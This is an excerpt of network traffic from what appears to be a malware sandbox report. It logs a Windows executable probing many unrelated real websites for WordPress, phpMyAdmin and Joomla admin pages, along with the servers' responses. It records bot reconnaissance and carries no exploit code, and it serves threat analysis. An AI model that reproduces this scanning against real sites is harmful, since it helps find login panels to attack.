                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><script src="https://www.google.com/adsense/domains/caf.js?abp=1" type="text/javascript"></script><noscript><style>#content-main{display:none}</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.066651106 CET669INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><script type="application/javascript">window.LANDER_SYSTEM="PW"</script><script type="text/javascript">var abp=void 0</script><script ty
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.068110943 CET338OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: gmailvz.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    Cookie: traffic_target=gd; caf_ipaddr=10.116.88.246; country=; city=""
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://gmailvz.com/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.079921961 CET669INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><script type="application/javascript">window.LANDER_SYSTEM="PW"</script><script type="text/javascript">var abp=void 0</script><script ty
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.166634083 CET1340INHTTP/1.1 200 OK
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 1177
                                                                                                                                                                                                    Last-Modified: Mon, 13 Nov 2023 23:35:06 GMT
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    ETag: "6552b2aa-499"
                                                                                                                                                                                                    X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_RcCZQzz6qYIENyHeJY2FSb+VMd8CNRxy2yBsxxOiWwd/yMD4sK6wxGGKM5IH6urXtRJjuYvuZrM8XSKVcgVlFQ
                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                    Set-Cookie: caf_ipaddr=10.116.88.246;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: country=;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: city="";Path=/;Max-Age=86400;
                                                                                                                                                                                                    Set-Cookie: traffic_target=gd;Path=/;Max-Age=86400;
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 2f 3e 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 6e 6f 73 63 72 69 70 74 3e 3c 73 74 79 6c 65 3e 23 63 6f 6e 74 65 6e 74 2d 6d 61 69 6e 7b 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 7d 3c 2f 73 74 79 6c 65 3e 3c 64 69 76 3e 46 6f 72 20 66 75 6c 6c 20 66 75 6e 63 74 69 6f 6e 61 6c 69 74 79 20 6f 66 20 74 68 69 73 20 73 69 74 65 20 69 74 20 69 73 20 6e 65 63 65 73 73 61 72 79 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 2e 20 48 65 72 65 20 61 72 65 20 74 68 65 20 3c 61 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f
                                                                                                                                                                                                    Data Ascii: <!doctype html><html lang="en"><head><meta http-equiv="content-type" content="text/html;charset=utf-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"/><title></title><script src="https://www.google.com/adsense/domains/caf.js?abp=1" type="text/javascript"></script><noscript><style>#content-main{display:none}</style><div>For full functionality of this site it is necessary to enable JavaScript. Here are the <a target="_blank" rel="noopener noreferrer" href="https://
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.166661978 CET216INData Raw: 77 77 77 2e 65 6e 61 62 6c 65 2d 6a 61 76 61 73 63 72 69 70 74 2e 63 6f 6d 2f 22 3e 69 6e 73 74 72 75 63 74 69 6f 6e 73 20 68 6f 77 20 74 6f 20 65 6e 61 62 6c 65 20 4a 61 76 61 53 63 72 69 70 74 20 69 6e 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77
                                                                                                                                                                                                    Data Ascii: www.enable-javascript.com/">instructions how to enable JavaScript in your web browser</a>.</div></noscript><script type="application/javascript">window.LANDER_SYS
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.166671991 CET507INData Raw: 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3d 76 6f 69 64 20 30 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                                                                                                                                                                    Data Ascii: TEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></script><script defer="defer" src="https://img1.wsim
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.179944992 CET507INData Raw: 54 45 4d 3d 22 50 57 22 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 76 61 72 20 61 62 70 3d 76 6f 69 64 20 30 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 74 79 70
                                                                                                                                                                                                    Data Ascii: TEM="PW"</script><script type="text/javascript">var abp=void 0</script><script type="text/javascript" src="/px.js?ch=1&abp=1"></script><script type="text/javascript" src="/px.js?ch=2&abp=1"></script><script defer="defer" src="https://img1.wsim


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    87192.168.2.45629647.246.24.211806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.965883017 CET223OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: wonka.cc
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.065097094 CET601INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Server: Tengine
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                    Content-Length: 262
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Location: https://wonka.cc/phpmyadmin/
                                                                                                                                                                                                    Via: ens-cache8.us18[,0]
                                                                                                                                                                                                    Timing-Allow-Origin: *
                                                                                                                                                                                                    EagleId: 2ff6189c17009783720068001e
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 68 61 73 20 62 65 65 6e 20 61 73 73 69 67 6e 65 64 20 61 20 6e 65 77 20 70 65 72 6d 61 6e 65 6e 74 20 55 52 49 2e 3c 2f 70 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>301 Moved Permanently</h1><p>The requested resource has been assigned a new permanent URI.</p><hr/>Powered by Tengine</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    88192.168.2.45632954.83.33.36806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:31.967703104 CET227OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: ce-logic.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.061657906 CET585INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.52 (Ubuntu)
                                                                                                                                                                                                    Location: https://ce-logic.com/phpmyadmin/
                                                                                                                                                                                                    Content-Length: 318
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 2f 70 68 70 6d 79 61 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 63 65 2d 6c 6f 67 69 63 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://ce-logic.com/phpmyadmin/">here</a>.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at ce-logic.com Port 80</address></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    89192.168.2.456236104.26.12.245806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.013000965 CET230OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: hightideinc.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.146816015 CET702INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Cache-Control: max-age=3600
                                                                                                                                                                                                    Expires: Sun, 26 Nov 2023 06:59:32 GMT
                                                                                                                                                                                                    Location: https://hightideinc.com/phpmyadmin/
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=brAiF2UxAh2gQi90xvNu5ii4h43lP4Raa4lnZvZZeWADvgyjHJU6sSCNxArpAkaJ%2Bq7%2BMXRDtLPEbqVq2hzUt9MVVsKZ%2BrXIqGfibWwt2byLk%2FeaAMAnlzFMI3BfUAPh%2BA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                    CF-RAY: 82bfe7e9582c0816-IAD
                                                                                                                                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    90192.168.2.456293162.241.62.220806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.013084888 CET233OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: lumaruniformes.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    91192.168.2.456098133.130.97.143806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.013086081 CET280OUTGET /administrator/index.php HTTP/1.1
                                                                                                                                                                                                    Host: digdig.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://digdig.org/administrator/
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.269383907 CET501INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.1e-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                                                                                    Content-Length: 221
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /administrator/index.php was not found on this server.</p></body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    92192.168.2.45638415.197.142.173806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.021636963 CET235OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: svenssonfriends.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.120031118 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-122-242.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 279bbd8c-e9fb-452d-a555-9c5c62aa2151
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.120320082 CET282OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                    Host: svenssonfriends.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Referer: http://svenssonfriends.com/wp-login.php
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.219139099 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Length: 125
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    Server: ip-10-123-122-167.ec2.internal
                                                                                                                                                                                                    X-Request-Id: 28c2f7ec-66a8-43c7-b694-011be95364eb
                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 2d 75 73 27 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 2a 2a 20 4e 6f 74 20 46 6f 75 6e 64 20 2a 2a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 48 54 54 50 20 53 74 61 74 75 73 3a 20 34 30 34 20 28 6e 6f 74 20 66 6f 75 6e 64 29 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML><html lang='en-us'><head><title>** Not Found **</title></head><body>HTTP Status: 404 (not found)</body></html>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    93192.168.2.45633245.40.150.54806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.027693033 CET229OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.178262949 CET268INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                    Server: openresty
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:23 GMT
                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                    x-backend: deny_backend
                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    94192.168.2.456381162.210.96.117806240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.031249046 CET237OUTGET /phpmyadmin/ HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    Nov 26, 2023 06:59:32.200989962 CET1340INHTTP/1.1 404 Not Found
                                                                                                                                                                                                    Date: Sun, 26 Nov 2023 05:59:32 GMT
                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                    Vary: accept-language,accept-charset,User-Agent
                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                    Content-Language: en
